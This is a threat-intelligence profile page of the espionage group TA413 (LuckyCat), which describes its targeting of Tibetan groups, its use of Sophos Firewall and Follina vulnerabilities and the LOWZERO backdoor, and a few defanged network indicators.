Ta413

Threat Actor updated 5 months ago (2024-05-04T20:45:57.913Z)
Download STIX
Preview STIX
TA413, also known as LuckyCat, is a threat actor suspected of conducting cyber espionage on behalf of the Chinese state. In the first half of 2022, TA413 targeted Tibetan individuals, organizations, and the exiled Tibetan government. The group exploited a now-patched zero-day vulnerability in the Sophos Firewall product (CVE-2022-1040), weaponized the "Follina" vulnerability (CVE-2022-30190) shortly after its discovery and publication, and utilized a custom backdoor named LOWZERO in campaigns against Tibetan entities. The group's adoption of both zero-day and recently published vulnerabilities reflects broader trends within Chinese cyber-espionage groups. TA413 appears to be part of a shared capability development pipeline serving multiple Chinese state-sponsored groups. This is evidenced by their continued use of the Royal Road RTF builder, a shared zero-day exploit in Sophos Firewall used by several China-linked groups, and their access to other shared malware families such as the TClient backdoor. A lure in the Tibetan language was used by TA413 in conjunction with the Royal Road tool, further indicating their specific targeting of the Tibetan community. Further analysis of TA413’s activities revealed the use of an IP address, 134.122.129[.]102, for post-exploitation purposes. At the time of activity, this IP address hosted applestatic[.]com, which has historical hosting overlaps with the TA413 domain newsindian[.]xyz. An additional group targeting the Tibetan community has been identified, suggesting that TA413 is not alone in its relentless pursuit of these targets. The group's custom backdoor, LOWZERO, was used to execute Base64-encoded PowerShell commands and download follow-on payloads, highlighting their advanced capabilities.
Description last updated: 2024-04-11T22:56:37.567Z
What's your take? (Question 1 of 1)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.
Alias DescriptionVotes
Luckycat is a possible alias for Ta413. LuckyCat, also known as TA413, is a threat actor with a history of malicious cyber activities. This group has been consistently targeting Tibetan entities, including individuals, organizations, and the exiled Tibetan government. Its activities have been linked to the use of ExileRAT and LuckyCat And
3
Lowzero is a possible alias for Ta413. Lowzero is a custom backdoor malware introduced by TA413, a deviation from their usual practice of using well-known or open-source tools. Throughout the first half of 2022, TA413 exploited various vulnerabilities, including a patched zero-day vulnerability in Sophos Firewall product (CVE-2022-1040),
2
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Source Document References
Information about the Ta413 Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more